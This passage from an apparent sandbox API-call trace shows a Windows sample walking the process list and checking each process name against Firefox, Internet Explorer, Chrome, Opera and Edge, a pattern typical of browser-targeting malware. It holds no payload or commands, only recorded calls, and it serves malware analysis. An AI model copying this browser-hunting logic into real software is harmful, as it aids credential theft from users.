(lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0210.062] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.062] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.063] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0210.063] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0210.063] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0210.063] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0210.063] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.063] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.064] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0210.064] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0210.064] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0210.064] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0210.064] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.064] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.064] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0210.064] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0210.064] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0210.064] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0210.064] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.064] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.065] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0210.065] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0210.065] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0210.065] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0210.065] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.065] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.065] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0210.065] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0210.065] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0210.065] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0210.065] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.065] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0210.066] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0210.066] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0210.066] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0210.066] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0210.066] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.066] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.067] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.067] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.067] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.068] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.068] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.068] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.069] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.069] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.069] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.069] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.069] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.069] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.069] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0210.069] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0210.069] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0210.070] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0210.070] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.070] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.070] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.070] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.070] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.070] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.070] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.070] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.071] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.071] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.071] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.071] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.071] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.071] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.071] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0210.071] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0210.071] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0210.071] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0210.071] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.071] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.072] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0210.072] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0210.072] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0210.072] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0210.072] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.072] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.073] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0210.073] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0210.073] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0210.073] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0210.073] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.073] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.073] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.073] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.073] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.073] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.073] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.073] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0210.074] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0210.074] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0210.074] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0210.074] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0210.074] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.074] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0210.074] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0210.074] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0210.074] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0210.074] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0210.074] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.074] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0210.075] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0210.075] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0210.075] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0210.075] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0210.075] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.075] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0210.076] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0210.076] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0210.076] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0210.076] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0210.076] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.076] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0210.076] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0210.076] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0210.076] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0210.076] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0210.076] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.076] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0210.077] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0210.077] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0210.077] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0210.077] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0210.077] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.077] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0210.077] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0210.077] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0210.077] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0210.077] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0210.077] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.077] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0210.078] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0210.078] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0210.078] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0210.078] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0210.078] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.078] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0210.079] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0210.079] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0210.079] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0210.079] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0210.079] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.079] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0210.079] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0210.079] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0210.079] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0210.079] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0210.079] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.079] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0210.080] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0210.080] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0210.080] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0210.080] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0210.080] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.080] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0210.080] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0210.080] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0210.081] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0210.081] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0210.081] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.081] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0210.081] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0210.081] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0210.081] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0210.081] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0210.081] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.081] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0210.082] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0210.082] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0210.082] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0210.082] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0210.082] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.082] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0210.082] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0210.082] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0210.082] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0210.082] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0210.082] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.082] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0210.083] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0210.083] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0210.083] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0210.083] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0210.083] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.083] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0210.084] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0210.084] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0210.084] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0210.084] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0210.084] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.084] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0210.084] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0210.084] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0210.084] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0210.084] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0210.084] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.084] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0210.085] lstrcmpiA 